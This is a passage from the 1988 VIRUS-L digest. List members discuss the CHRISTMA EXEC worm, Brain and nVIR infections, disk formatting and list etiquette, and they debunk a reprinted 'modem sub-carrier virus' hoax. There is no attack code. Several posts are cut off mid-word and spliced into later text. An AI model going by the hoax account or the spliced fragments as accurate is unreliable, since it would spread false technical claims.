  3159.          been hit.
  3160.  
  3161.       9) We have it disassembled and I will getting help from our
  3162.          EE depart that will detect and erase the worm,
  3163.          it is appended to this request for info.  [Ed. The program
  3164.          was rather large; I'll make it available via the LISTSERV if
  3165.          there is sufficient interest.]
  3166.  
  3167.    Questions
  3168.     1)  Have you seen this worm before?
  3169.     2)  Any idea of the origin?
  3170.     3)  Will this worm really erase the FAT?
  3171.  
  3172.   I am not on this news group please respond to me direct.
  3173.  
  3174.  Michael MacDonald
  3175.  Software Specialist, School of Computer Science
  3176.  University of New Brunswick
  3177.  Po. Box 4400
  3178.  Fredericton, New Brunswick
  3179.  CANADA    E3B 5A3
  3180.  
  3181.  (506) 453-4566
  3182.  
  3183.  Netnorth/BITNET: MIKEMAC@UNB.CA
  3184.  
  3185. ------------------------------
  3186.  
  3187. End of VIRUS-L Digest
  3188. *********************
  3189. VIRUS-L Digest             Tuesday, 13 Dec 1988         Volume 1 : Issue 44
  3190.  
  3191. Today's Topics:
  3192. emergency messages
  3193. more on modem virus
  3194. low level format
  3195.  
  3196. ---------------------------------------------------------------------------
  3197.  
  3198. Date: Mon, 12 Dec 88 22:26:42 CDT
  3199. From: Len Levine <len@evax.milw.wisc.edu>
  3200. Subject: emergency messages
  3201.  
  3202. >** OVERFLOW ** OVERFLOW ** OVERFLOW ** OVERFLOW ** OVERFLOW ** TILT **
  3203. >I'm facing a dilemma that may be troubling other readers of this llist
  3204. >as well:  the list contents is getting just too voluminous (not to say
  3205. >repetitious at times) and I just don't have time to wade through it all
  3206. > [...]
  3207.  
  3208. Why not send such emergency messages with a different caption than is
  3209. normally used in this collection.  That way a normal reader can look
  3210. at the messages when s/he has time, and read the alarms when they come
  3211. up.
  3212.  
  3213. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  3214. | Leonard P. Levine               e-mail len@evax.milw.wisc.edu |
  3215. | Professor, Computer Science             Office (414) 229-5170 |
  3216. | University of Wisconsin-Milwaukee       Home   (414) 962-4719 |
  3217. | Milwaukee, WI 53201 U.S.A.              Modem  (414) 962-6228 |
  3218. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  3219.  
  3220. [Ed. Hopefully, this problem has been taken care of with VALERT-L...]
  3221.  
  3222. ------------------------------
  3223.  
  3224. Date:     Mon, 12 Dec 88 22:02 EST
  3225. From:     <LACUREJ@IUBACS>
  3226. Subject:  more on modem virus
  3227.  
  3228. A report of the so-called modem virus was posted to a local BBS here
  3229. in Bloomington, Indiana, about a month ago.  I know nothing about
  3230. sub-carriers on 2400 baud modems, but I found the idea of a virus
  3231. inhabiting the registers of a modem to be so fantastic that I
  3232. dismissed the report as nothing more than a prank.  Below is a copy of
  3233. the first message in the report, it was followed by a series of
  3234. messages as the virus allegedly spread through Washington State.
  3235.  
  3236. Jon LaCure
  3237. Indiana University
  3238. lacurej@iubacs
  3239.  
  3240. Report:
  3241. - ----------------------------------------------------------------------------
  3242.  
  3243. Thd on a Seattle board.  Looks like a really
  3244. bad virus is out now.  TC
  3245. - -------------------------------------------------------------------- a
  3246. #1153 OF 1165 TIME:  TUE 10-04-88  03:17:41 FROM:  MIKE ROCHENLE   TO:  ALL
  3247. SUBJ:  Really nasty virus
  3248. AREA:  GENERAL (1)
  3249.    I've just discovered probably the world's worst computer virus yet.
  3250. I had just finished a late night session of BBS'ing and file trading
  3251. when I exited Telix 3 and attempted to run pkxarc to unarc the
  3252. software I had downloaded.  Next thing I knew my hard disk was seeking
  3253. all over and it was apparantly writing random sectors.  Thank god for
  3254. strong coffee and a recent backup.  Everything was back to normal, so
  3255. I called the BBS again and downloaded a file.  When I went to use ddir
  3256. to list the directory, my hard disk was getting trashed agaion.  I
  3257. tried Procomm Plus TD and also PC Talk 3.  Same results every time.
  3258. Something was up so I hooked up my test equipment and different modems
  3259. (I do research and developmentis the world's worst
  3260. computer virus yet.  The virus distributes itself on the modem
  3261. sub-carrier present in all 2400 baud and up modems.  The sub-carrier
  3262. is used for ROM and register debugging purposes only, and otherwise
  3263. serves no othr purpose.  The virus sets a bit pattern in one of the
  3264. internal modem registers, but it seemed to screw up the other
  3265. registers on my USR.  A modem that has been "infected" with this virus
  3266. will then transmit the virus to other modems that use a subcarrier (I
  3267. suppose those who use 300 and 1200 baud modems should be immune).  The
  3268. virus then attaches itself to all binary incoming data and infects the
  3269. host computer's hard disk.  The only way to get rid of the virus is to
  3270. completely reset all the modem registers by hand, but I haven't found
  3271. a way to vaccinate a modem against the virus, but there is the
  3272. possibility of building a subcarrier filter.  I am calling on a 1200
  3273. baud modem to enter this message, and have advised the sysops of the
  3274. two otherly the best thing to
  3275. do now is to stick to 1200 baud until we figure this thing out.
  3276.  
  3277.                                         Mike RoChenle
  3278.  
  3279. ------------------------------
  3280.  
  3281. Date:         Tue, 13 Dec 88 03:50:23 EST
  3282. From:         "Homer W. Smith" <CTM@CORNELLC>
  3283. Subject:      low level format
  3284.  
  3285.      Thank you all for responding how to do a low level format
  3286. of my PC.  I have suspected it for a long time for minor
  3287. misbehaviors and I doubt it is a virus, but you neverknow.
  3288. I have used a software disk from DAK with bulliten board stuff
  3289. on it, so who knows how infected I am.
  3290.  
  3291.      Anyhow, most that responsded said the low level format would
  3292. handle everything for me.  One though said that I had to know where
  3293. the hard disk errors were and feed them to the low level format
  3294. program as it prompted me for them.  They said these hard errors
  3295. were written on some tag on the disk itself.
  3296.  
  3297.      Asking others about this, they said no way, the program would
  3298. just do it and find all t the dos manual at all about it.
  3299. So the more specific you are the better.
  3300.  
  3301.      Respond if you want to ctm@cornellc.
  3302.  
  3303. ------------------------------
  3304.  
  3305. End of VIRUS-L Digest
  3306. *********************
  3307.  
  3308. VIRUS-L Digest             Tuesday, 13 Dec 1988         Volume 1 : Issue 45
  3309.  
  3310. Today's Topics:
  3311. on CHRISTMA EXEC (IBM VM/CMS)
  3312. Undigestifyer for MSDOS?
  3313. Current status of Fred Cohen
  3314. RE: Low Level Formats on IBM's (PC)
  3315. contacting people at BITNET addresses
  3316. More on modem virus
  3317. Virus alerts
  3318. Re: CHRISTMA EXEC?? Kids Stuff!!!! (IBM VM/CMS)
  3319. re: modem virus
  3320. Re: PC virus reported in V1 I43 by MIKEMAC@UNB.BITNET
  3321. MegaROM CD with nVIR (Mac)
  3322. Some people aren't fighting...
  3323.  
  3324. ---------------------------------------------------------------------------
  3325.  
  3326. Date:      Tue, 13 Dec 88 09:01:56 LCL
  3327. From:      Bret Ingerman [{315} 443-1865] <INGERMAN@SUVM.BITNET>
  3328. Subject:   on CHRISTMA EXEC (IBM VM/CMS)
  3329.  
  3330. re:        Gabriel Basco's recent note...
  3331.  
  3332.    It would seehecking out the
  3333. code (which is what we did with the Christmas EXEC).  If you can't
  3334. read the code, then you probably should not run the program.
  3335.  
  3336.  
  3337.         BRET INGERMAN   ACADEMIC COMPUTING SERVICES
  3338.               ______    SYRACUSE UNIVERSITY
  3339.              /      |         -------
  3340.             |       |   BITNET:    INGERMAN@SUVM
  3341.   _________/        |   NOISENET:  (315) 443-1865
  3342.   |         *       |   SNAILNET:  215 Machinery Hall
  3343.  /      SYRACUSE    |              Syracuse, NY 13244-1260 USA
  3344. |______________     |
  3345.                |_   |
  3346.                  |__|   DISCLAIMER: I didn't say that, did I???
  3347.  
  3348. ------------------------------
  3349.  
  3350. Date:     Sun, 11 Dec 88 13:16 EDT
  3351. From:     Peter D. Junger <JUNGER@CWRU>
  3352. Subject:  Undigestifyer for MSDOS?
  3353.  
  3354.         I would be very happy to have an undigestifyer running on VMS,
  3355. but there is so little space on our node that I would be much better
  3356. off if I could down-load digests to my PC and do the undigestifying
  3357. there?  Does an MSDing un-digestifier
  3358. for any system - please let me know so that I can post it on the
  3359. LISTSERV here.]
  3360.  
  3361. ------------------------------
  3362.  
  3363. Date:    Tue, 13 Dec 88 08:13 CST
  3364. From:    Ken  De Cruyenaere <KDC@UOFMCC> 204-474-8340
  3365. Subject: Current status of Fred Cohen
  3366.  
  3367. Fred was one of the speakers at the CSI conference in Miami last month.
  3368. At the time he said that anyone interested in more material should
  3369. leave their names.  I did.  I received the following:
  3370.  
  3371.    Hi,
  3372.     I'm sorry I have to do this by form letter,
  3373.   but I go so many requests for
  3374.   information about my papers, I simply couldn't do it any other way.
  3375.   I put you in a mailing list for people interested in viruses so I
  3376.   can continue to let you know about new results.  If you want out of
  3377.   the mailing list, just let me know.
  3378.     I have 2 books on viruses that you might be interested in.
  3379.   One is my PhD thesis, written in 1984 at USC, and has all of the
  3380.   mathematical details you will likely ever want to see (and perhaps
  3381.   more).  The other is simply a collection of all the journal articles
  3382.   I have published in the last 5 or so years placed in a single
  3383.   binder for your reading convenience.
  3384.      The cost (everything included - 1st class mail, etc.) is
  3385.   $20/book, which should't break you or your organization.  If you'd
  3386.   like one or more of one or both, just fill in the form at the
  3387.   bottom of the page, send a check or money order (payable to
  3388.   Advanced Software Protection) to:
  3389.        Fred Cohen
  3390.        c/o Advanced Software Protection
  3391.        PO Box 90069
  3392.        Pittsburgh, PA 15224
  3393.  
  3394.      I will get copies to you as soon as I can...
  3395.                              Thank you for your interest,
  3396.  
  3397.                              Fred Cohen
  3398.   -------------------------------------------------------------
  3399.       title                       how many             total
  3400.   Computer Viruses - the thesis    _______   @$20      _______
  3401.   Fred's Papers                    _______   @$20      _______
  3402.                                Grand Total            $_______
  3403.  
  3404. ------------------------------
  3405.  
  3406. Date:     TUE DEC 13, 1988 09.50.15 EST
  3407. From:     "David A. Bader" <DAB3@LEHIGH>
  3408. Subject:  RE: Low Level Formats on IBM's (PC)
  3409.  
  3410. I recently low level formatted my 40 meg hard disk (not a fun
  3411. experience) because I had some minor non-virus related problems with a
  3412. partition.  Anyway, the only program I had around to do this format
  3413. was a PD Low level format which did not ask me for my bad sector list
  3414. (which should be adhesed to the top of everyone's hard disk by the
  3415. manufacturer).  However, I have seen some formatter's that do ask for
  3416. this list to be typed in.
  3417.  
  3418.       -David Bader
  3419.        DAB3@LEHIGH
  3420.  
  3421. ------------------------------
  3422.  
  3423. Date: Tue, 13 Dec 88 09:57:01 est
  3424. From: preedy@nswc-wo.arpa
  3425. Subject: contacting people at BITNET addresses
  3426.  
  3427.      I am having trouble getting through to bitnet addresses.  It
  3428. would be helpful for those who are asking for information to put the
  3429. address that those of us on arpanet could use.  Several times I have
  3430. tried to contact people and the mail was sent back by the postmaster.
  3431. If anyone has the "rules" for changing bitnet addresses to arpanet
  3432. address format, I would appreciate it.
  3433.  
  3434. Greg - What is the title you are interested in?  I have several
  3435. articles by Fred Cohen.
  3436.  
  3437. [Ed. On sending to BITNET from Internet/ARPAnet - Most mailers will
  3438. send mail addressed to user@node.BITNET through the appropriate
  3439. gateway.  If that doesn't work, you can usually get away with
  3440. user%node.BITNET@gateway - where "gateway" is a known Internet/Arpanet
  3441. to BITNET gateway, such as the one at CUNYVM.CUNY.EDU.]
  3442.  
  3443. ------------------------------
  3444.  
  3445. Date: Tue, 13 Dec 88 10:29:10 EST
  3446. From: Don Alvarez <boomer@space.mit.edu>
  3447. Subject: More on modem virus
  3448.  
  3449. Quoting from issue 44:
  3450.    I've just discovered probably the world's worst computer virus yet.
  3451. I had just finished a late night session of BBS'ing and file trading
  3452. when I exited Telix 3 and attempted to run pkxarc to unarc the
  3453. software I had downloaded.  Next thing I knew my hard disk was seeking
  3454. ...END Quote
  3455.  
  3456.     I'm a Mac user and don't recognize those words.  Is the
  3457.     speaker talking IBM-PC words, Amiga words, VMS words, etc.
  3458.     What kind of computer did he have?
  3459.  
  3460.     If the virus is real, it must be writing itself into the
  3461.     on-board storage space used in high-speed modems and then
  3462.     instructing the modem to run that portion of memory (good way
  3463.     to check if this virus is real: Does anyone know if high
  3464.     speed modem chips are designed on Harvard-type architectures
  3465.     (separate Program/Data), I think many DSP chips are now
  3466.     designed that way).  If my guess is right, the virus could
  3467.     not propagate on modems with Harvard-Architecture as they
  3468.     would be unlikely to have sufficient "program" memory for
  3469.     a virus (the speaker mentions setting a "bit pattern in an
  3470.    modem register," I can't believe that alone is enough
  3471.     to make a hard-disk crashing virus).
  3472.  
  3473.     The reason why I ask what kind of PC the author is using is that
  3474.     it is EXTREMELY unlikely in my opinion that a virus of this sort
  3475.     could infect different kinds of computers... Mac boot blocks dont
  3476.     look anything like PC boot blocks.
  3477.  
  3478.     Also, as I understand it, a good 9600baud modem is completely
  3479.     transparent to the user... once you configure it, it looks like
  3480.     a 9600 baud cable connected to a computer.  Sounds to me like
  3481.     this virus must be keyed not only to a specific computer but
  3482.     also to a specific PC based file-capture program, and will probably
  3483.     not propagate if all you do is 9600 baud terminal emulation.
  3484.  
  3485.                         - Don Alvarez
  3486.  
  3487.     Disclaimer: "He's not the messiah, he's just a very naughty boy
  3488.     (who of course isn't speaking for himself, his employer, or the
  3489.     local dry-cleaner)."
  3490.  
  3491.      + -------------------------618   |
  3492.      |   (617) 253-7457            Cambridge, MA 02139             |
  3493.      + ----------------------------------------------------------- +
  3494.  
  3495. [Ed. I think that the first report of this purported virus was
  3496. referring to a PC environment.]
  3497.  
  3498. ------------------------------
  3499.  
  3500. Date: Mon, 12 Dec 88 17:30:29 CST
  3501. From: David W. Richardson <C044DWR@utarlg.arl.utexas.edu>
  3502. Subject: Virus alerts
  3503.  
  3504. On 12-9, Ben Chi <
  3505. (BEN@ALBNYVM1.BITNET) asked for another listserv that would distribute virus
  3506. warnings.  I have a suggestion:
  3507.  
  3508. 1.  All messages which are warnings use the same subject line, for
  3509. example Subject: "VIRUS WARNING: XXXXXXXX" where XXXXXXXX is the real
  3510. subject.  We could use our mail directories to filter the vital info
  3511. from the rest of the list.
  3512.  
  3513. 2.  When digesting, put the VIRUS WARNINGs at the beginning of the
  3514. digests, so that we digest-readers can only worry about the vital
  3515. stuff (if we so choose).
  3516.  
  3517. Similarly, there could be a reserved subject called RECENT CUi-viral measures.
  3518.  
  3519. - -David Richardson
  3520. c044dwr <--reveiw this list on 1/1 for my new address
  3521.  
  3522. Are they viruses or viri?  I'm asking.
  3523.  
  3524. [Ed. Viruses.  Good suggestions, thanks...  That, in conjunction with
  3525. the non-moderated (for timeliness) VALERT-L is what I'll shoot for.]
  3526.  
  3527. ------------------------------
  3528.  
  3529. Date:        13 December 88, 18:51:33 +0100 (MEZ)
  3530. From:        Otto Stolz         +49 7531 88 2645     RZOTTO   at DKNKURZ1
  3531. Subject:     Re: CHRISTMA EXEC?? Kids Stuff!!!! (IBM VM/CMS)
  3532.  
  3533. > Or should we just don't run any programs that appear in the READER??
  3534.  
  3535. Gabe,
  3536.  
  3537. perhaps the rule should read:
  3538.    Don't run any programs that you neither can read and understand,
  3539.    nor have ordered from some trustworthy supplier,
  3540.    regardless of the way or media of delivery
  3541.    (i.e. this even applies to printed copies of source programs
  3542.    in a language you are not familiar with).
  3543.  
  3544. Best regards
  3545.              Otto
  3546.  
  3547. ------------------------------
  3548.  
  3549. Date:     Tue, 13 Dec 88 11ble enough so the virus could store itself in them all?
  3550.  
  3551. 2. Do these modems have enough internal memory to store all the
  3552. infirmation needed?
  3553.  
  3554. 3. No mention is made of what computer or operating systems
  3555. are being used (probably default=ms-dos on a pc clone).
  3556.  
  3557. Paranoid conjecture: there is >>>no<<< modem virus!!!
  3558. It is just a rumor being spread by a modem company that
  3559. either (1) does not sell fast modems or (2) will be coming
  3560. out shortly with a "virus-proof" modem.
  3561.  
  3562. Marty Cohen (mcohen@nrtc.northrop.com, 128.99.0.1)
  3563.  
  3564. ------------------------------
  3565.  
  3566. Date:         Tue, 13 Dec 88 14:54:25 EST
  3567. From:         Naama Zahavi-Ely <ELINZE@YALEVM.BITNET>
  3568. Subject:      Re: PC virus reported in V1 I43 by MIKEMAC@UNB.BITNET
  3569.  
  3570. Hello!
  3571.  
  3572. This seems like a virus that we found here at Yale this summer.  I
  3573. doubt very much that it originated here.  If it is the same one, then
  3574. it is nearly invisible on a PC, but if you try to boot an AT from an
  3575. infected disk, it will "hang" with an undeputer will stay "hung".  If one tries to
  3576. soft-boot an infected AT from a write-protected disk, it will seem to
  3577. function normally, but will still be infected.  To the best of my
  3578. knowledge, the virus did not erase any FAT tables.  Also to the best
  3579. of my knowledge, it was brought over to Yale unintentionally by a
  3580. visiting scholar.
  3581. I hope this helps!
  3582.  
  3583. Naama
  3584.  
  3585. + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
  3586. |  Naama Zahavi-Ely                                                    |
  3587. |  Project ELI                           E-MAIL ELINZE@YALEVM.BITNET   |
  3588. |  Yale Computer Center                                                |
  3589. |  175 Whitney Ave                                                     |
  3590. |  New Haven, CT 06520                                                 |
  3591. |  (203) 432-6600 ext. 341                                             |
  3592. + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +
  3593.  
  3594. ------------------------------
  3595.  
  3596. Date: Shuster 74166,2027
  3597. >To: All
  3598. >
  3599. >Unfortunately, I have just discovered that the "MegaROM" CD-ROM (Vol
  3600. >1,Oct 88) is infected with the "nVIR" virus in seven files.  What's
  3601. >worse is that among the infected files are Hypercard and Stuffit
  3602. >1.5.1, two applications most likely to be executed from it.  Please
  3603. >check your copies of Hypercard and Stuffit (and the other applications
  3604. >listed below) for "nVIR" resources (numbered 1,2,3,6, and 7): if
  3605. >present, you're infected.
  3606. >
  3607. >The MegaROM CD is available from either Quantum Leap Technologies or
  3608. >Nimbus Information Systems. The one that I found to be infected is
  3609. >marked Volume 1, October 88 (another version is planned for January
  3610. >89). The infected files are:
  3611. >  DAs:McSink 5.0:McSink Opener
  3612. >  Graphics:*VideoWorks:BigSound VW Player
  3613. >  Graphics:Dynamo
  3614. >  Hypercard Files:Hypercard 1.21:Hypercard
  3615. >  Hypercard Files:Sound Stacks:Sound Utilities:SoundMover
  3616. >  Modem Files:Archiving Utilities:Stuffit Update:Stuffit 1.5.1
  3617. >  Utilit. Note that Apple's Virus Rx currently will not detect this
  3618. >virus!
  3619. >
  3620. >It didn't do any damage to me (besides the time it took to disinfect).
  3621. >The first symptom I had was a bomb on startup, apparently forced by
  3622. >Vaccine when it adetects an infected System or Finder. Unfortunately,
  3623. >the disk was apparently infected just days before the final directory
  3624. >was built (all the modification dates of the infected applications are
  3625. >from 10/11 to 10/13/88).
  3626. >
  3627. >The CD is otherwise a tremendous bargain, with more than 300 megabytes
  3628. >of software and data for $50.
  3629. >
  3630. >--Cy Shuster-
  3631.  
  3632. The bomb is caused because Vaccine attempts to put up a dialog at INIT
  3633. time, but not all of the necessary managers are initialized then.
  3634.  
  3635. This infection has not yet been verified. Can others with this CD-ROM
  3636. disk check and post back to the list?
  3637.  
  3638. - --- Joe M.
  3639.  
  3640. ------------------------------
  3641.  
  3642. Date:         Tue, 13 Dec 88 15:58:18 EST
  3643. From:         Joe McMahon <XRJDM@SCFVM>
  3644. Subject:      Some peoplo-hum attitude indeed! Or worse!
  3645.  
  3646. A student came referred to me last week because her teacher said that
  3647. anyone whose final project bombed during the review would drop two
  3648. letter grades: that's from an "A" to a "C", "B" to a "D", etc. Fairly
  3649. stringent for a 1st quarter mac programming course.
  3650.  
  3651. She had made some references to fonts which were not resident on most
  3652. systems as well as a few other stupid mistakes (hell, her wholeprogram
  3653. was not very well thought out, but that's not my problem. In fact,
  3654. helping students with their programming is DEFINITELY NOT my problem)
  3655. and we recompiled and it worked (in its stupid way) well, without
  3656. bombing.
  3657.  
  3658. I took the liberty of insisting that I remove some disabled dotted
  3659. lines stuck at the end of some one-item pull down menus (more bad
  3660. interface) and found nVIR in her program and in her copy of RMaker on
  3661. her disk. My Mac is protected, so it wasn't a problem for me, but she
  3662. was going to go around and stick this disk in whatever computause
  3663. her to rebuild her resource file (LOTS of PICTs). She grabbed her disk
  3664. and ran from my office screaming that is wasn't her fault and why
  3665. didn't everyone leave her alone.
  3666.  
  3667. Subsequent conversations with her professor -- in a discrete manner --
  3668. revealed her to be earning about a "D" up to that point anyway.
  3669.  
  3670. So talk about "ho-hum". I'd call that "agressive and blatant
  3671. disregard".that "ag
  3672.  
  3673. - --scott
  3674.  
  3675. << Ack!
  3676. <<
  3677. << --- Joe M.
  3678.  
  3679. ------------------------------
  3680.  
  3681. End of VIRUS-L Digest
  3682. *********************VIRUS-L Digest            Wednesday, 14 Dec 1988        Volume 1 : Issue 46
  3683.  
  3684. Today's Topics:
  3685.  
  3686. Fred Cohens Thesis
  3687. VIRUS WARNING:  Brain Virus at Yale
  3688. Information Overload
  3689. Re: modem virus
  3690. >> TROUBLE << - Brain virus on distribution disk (PC)
  3691.  
  3692. ---------------------------------------------------------------------------
  3693.  
  3694. Date:     Tue 13 Dec 1988 17:25 CDT
  3695. From:     GREENY <MISS026@ECNCDC>
  3696. Subject:   Fred Cohens Thesis
  3697.  
  3698. Hiya all, I too have been attempting to get a copy of Fred Cohens
  3699. thesis and I finally broke down and went into the library and heres
  3700. what I dug up.
  3701.  
  3702. 1) I looked in the lists of dissertations after getting the librarian to
  3703.    look it up for me on DIALOGUE.
  3704.  
  3705. 2) The only copies available are directly from the Micrographics Department
  3706.     at University of Southern California (los angeles I think....)
  3707.  
  3708. So I put my interlibrary request thru, and Im still waiting three
  3709. weeks later.  I think Ill just buy one....by the time interlibrary
  3710. loan comes thru, Ill be 95 yrs old...:->
  3711.  
  3712. Bye for now but not for long
  3713. Greeny
  3714. Bitnet: miss026@ecncdc
  3715. Internet: miss026%ecncdc.bitnet@cunyvm.cuny.edu
  3716.  
  3717. ------------------------------
  3718.  
  3719. Date:         Wed, 14 Dec 88 15:31:46 EST
  3720. From: "Conrad Jacoby (DC)" <JACOBY@YALEVM.BITNET>
  3721. Subject:      VIRUS WARNING:  Brain Virus at Yale
  3722.  
  3723. Howdy!!
  3724.  
  3725.     Last night one of our computer consultants encountered a user who
  3726. had all his disks infected with some version of the BRAIN virus.
  3727. We're working on figuring out where any infected sites might be, as
  3728. well as try to detect any changes that have been made to the Brain to
  3729. change it from its original code.
  3730.  
  3731.     As we do not know how long this user (who is a Yale Grad Student)
  3732. might have had his disks infected, it might be prudent if you have
  3733. visited Yale recently and used a PC there to check your disks.  We're
  3734. hoping it was just a very isolated outbreak.
  3735.  
  3736. - --------------------------------------------------------------------------
  3737. Conrad J. Jacoby                       P.O. Box 3805 Yale Station
  3738. Yale University                        New Haven, CT 06520
  3739. Sterling Memorial Library              (203) 436-1402
  3740.  
  3741. "Generalist at Large"                  Jacoby@Yalevm.Bitnet
  3742.                                              @Yalevm.ycc.yale.edu
  3743. - --------------------------------------------------------------------------
  3744.  
  3745. [Ed. This is a reposting (the first!) from VALERT-L...just for those
  3746. who might be interested.]
  3747.  
  3748. ------------------------------
  3749.  
  3750. Date:  Wed, 14 Dec 88 15:02 EST
  3751. From:  Lynn R Grant <Grant@DOCKMASTER.ARPA>
  3752. Subject:  Information Overload
  3753.  
  3754. Regarding the recent complaints about too much information on Virus-L to
  3755. be able to find anything, I had a thought:  how much smaller would the
  3756. Virus-L digests be if we cut back on the long right-bracketed quotations
  3757. from previous entries and the multi-line signiture blocks, complete with
  3758. pictures, cursive signatures, and quotations from favorite cartoon
  3759. characters?  I'm rather new to Virus-L, so I don't know to what degree
  3760. these things are an essential part of the Virus-L culture, but its a
  3761. thought.
  3762.  
  3763.      Lynn Grant
  3764.  
  3765. [Ed. The right hand bracket quotations can certainly be cut to a
  3766. minimum from time to time, leaving just enough to get the pertinent
  3767. information across, in my opinion.  As for the signatures, being
  3768. somewhat of an, er, culprit myself...I believe that a 5 line signature
  3769. is a generally accepted network etiquette standard, and I don't see
  3770. anything wrong with getting five lines of identifying text in.  Any,
  3771. er, additional text in those five lines doesn't do much harm, I should
  3772. think...  :-)]
  3773.  
  3774. ------------------------------
  3775.  
  3776. Date: Wed, 14 Dec 88 14:27:54 CST
  3777. From: "Rich James" <MATHRICH@UMCVMB>
  3778. Subject: Re: modem virus
  3779.  
  3780. It looks to me like the initial announcement of this purported virus was
  3781. itself a virus attack against human hardware!  It cleverly exploits the
  3782. current pitch of fear about viruses, and has a phenomenal infection rate.
  3783. Thanks goodness it's relatively benign!
  3784. Think of it now folks:
  3785.  
  3786. How could a self replicating virus become embedded in registers which are
  3787. used to hold data, not program instructions?  The only memory used to hold
  3788. program instuctions in a modem is ROM.  Data registers are treated as DATA.
  3789. Getting a modem to treat a data register as program input would require
  3790. the exploitation of a known bug in the modem's ROM program.  Such ROMs
  3791. are anything but standard .. they vary between manufacturers and
  3792. between models and revisions of modems from the same manufacturer.
  3793.  
  3794. How likely is it that an industry standard modem protocol would have an
  3795. 'unused bandwidth' sufficient to allow simultaneous transmission of a
  3796. separate data stream?  It wouldn't be much of a protocol if it ignored
  3797. such potentially useful bandwidth.
  3798.  
  3799. How could such a virus convince the terminal program running on the
  3800. computer to modify system files, especially in a user-transparent way?
  3801. (it's easy enough to clobber a file by writing over it, but patching a
  3802. machine code file or RAM resident code in a transparent way is pretty
  3803. non trivial) Remember, incoming modem data is treated as DATA, not
  3804. program information. Again, this would require exploitation of a known
  3805. bug common to all or many modem programs, and all or many error
  3806. correcting protocols. Seems a tad unlikely.
  3807.  
  3808. Education=immunization.
  3809.  
  3810. ------------------------------
  3811.  
  3812. Date:         Wed, 14 Dec 88 18:26:40 EDT
  3813. From:         SSAT@PACEVM
  3814. Subject:      >> TROUBLE << - Brain virus on distribution disk (PC)
  3815.  
  3816. I just received my own personal copy of a popular IBM word processor
  3817. >> DIRECT FROM THE MANUFACTURER << in a sealed carton, and guess what?
  3818.  
  3819. When I installed it, it decided to be nice and loaded my disks with
  3820. BRAIN!
  3821.  
  3822. Yes, the disks I installed it on were BRAND NEW and freshly formatted
  3823. from a secure copy of DOS.
  3824.  
  3825. I don't want to mention any names here, but I spoke to the manufacturer
  3826. who was not at all surprised (in my opinion) that this had happened.
  3827.  
  3828. To reiterate, it DID NOT happen at Pace University, but to my own personal
  3829. copy of
  3830.  
  3831.  
  3832. [Ed. of?  of what?  I don't think that mentioning the name here, if
  3833. indeed the virus is on the distribution disk, would do any harm; quite
  3834. the contrary, it would warn innocent (prospective) buyers.]
  3835.  
  3836. ------------------------------
  3837.  
  3838. End of VIRUS-L Digest
  3839. *********************
  3840. VIRUS-L Digest             Thursday, 15 Dec 1988        Volume 1 : Issue 47
  3841.  
  3842. Today's Topics:
  3843. Re: CHRISTMA EXEC?? Kids Stuff!!!! (IBM VM/CMS)
  3844. Modem virus
  3845. Request for list of viruses (Mac and PC)
  3846.  
  3847. ---------------------------------------------------------------------------
  3848.  
  3849. From: portal!cup.portal.com!dan-hankins@Sun.COM
  3850. Date: Wed, 14-Dec-88 15:32:52 PST
  3851. Subject:     Re: CHRISTMA EXEC?? Kids Stuff!!!! (IBM VM/CMS)
  3852.  
  3853. In an article posted 13 December 88, 18:51:33 Otto Stolz writes:
  3854.  
  3855. >   Don't run any programs that you neither can read and understand,
  3856. >   nor have ordered from some trustworthy supplier,
  3857.  
  3858.      The interesting thing about the CHRISTMA EXEC was that it mailed
  3859. itself to people in your nicknames and netlog files.  Namely, people
  3860. with whom you regularly correspond.  So here at IBM, employees would
  3861. receive this exec from people they regularly corresponded with - i.e.
  3862. people they knew and trusted.  So CHRISTMA EXEC *did* come from a
  3863. trustworthy supplier!
  3864.  
  3865.      Even shrink-wrapped software from a multi-million dollar
  3866. corporation cannot be considered as coming from a trustworthy supplier
  3867. - - Aldus accidentally distributed FreeHand with the MacMag virus in it.
  3868.  
  3869.      If you mean not to run any program you can't read and understand
  3870. *even* if from a trustworthy supplier, then you've just killed the
  3871. entire software business.  How many software companies provide large
  3872. database programs in source form?  How many users could understand all
  3873. of such a beast if they did get it in source form?  Sometimes even the
  3874. people writing the software do not understand all of it.
  3875.  
  3876.  
  3877. Dan Hankins
  3878.  
  3879. ------------------------------
  3880.  
  3881. From: portal!cup.portal.com!dan-hankins@Sun.COM
  3882. Subject: Modem virus
  3883. Date: Wed, 14-Dec-88 18:18:12 PST
  3884.  
  3885.      From the description of the remedies given by the person who
  3886. purportedly found this alleged virus, I'd have to guess that it could
  3887. be an attempt to cut down on modem traffic by making people scared to
  3888. use their modems.  I can think of several reasons why someone would
  3889. want to cut down on transfers of programs and data freely over phone
  3890. lines.
  3891.  
  3892.  
  3893. Dan Hankins
  3894.  
  3895. ------------------------------
  3896.  
  3897. Date:      Thu, 15 Dec 88 08:28:20 LCL
  3898. From:      Bret Ingerman [{315} 443-1865] <INGERMAN@SUVM.BITNET>
  3899. Subject:   Request for list of viruses (Mac and PC)
  3900.  
  3901.    A simple request (I hope): Would it be possible for someone to post
  3902. a listing of all known Mac and IBM viruses, what they do, and how to
  3903. treat them (i.e., what softwaPlease let me know if such a list exists or if it would be wise
  3904. for me to create one.  Thanks.
  3905.  
  3906.         BRET INGERMAN   ACADEMIC COMPUTING SERVICES
  3907.               ______    SYRACUSE UNIVERSITY
  3908.              /      |         -------
  3909.             |       |   BITNET:    INGERMAN@SUVM
  3910.   _________/        |   NOISENET:  (315) 443-1865
  3911.   |         *       |   SNAILNET:  215 Machinery Hall
  3912.  /      SYRACUSE    |              Syracuse, NY 13244-1260 USA
  3913. |______________     |
  3914.                |_   |
  3915.                  |__|   Disclaimer:  Who said that?
  3916.  
  3917. ------------------------------
  3918.  
  3919. End of VIRUS-L Digest
  3920. *********************
  3921.  
  3922.  
  3923. VIRUS-L Digest             Thursday, 15 Dec 1988        Volume 1 : Issue 48
  3924.  
  3925. Today's Topics:
  3926. Report of Brain unclear
  3927. Details on Brain virus at Yale (PC)
  3928. generic undigestifier
  3929.  
  3930. ---------------------------------------------------------------------------
  3931.  
  3932. Date:         Thu, 15 Dec 88 09:13:26 EST
  3933. From:         Joe Simpson <JS05STAF@MIAMIU.BITNET>
  3934. Subject:      Report of Brain unclear
  3935.  
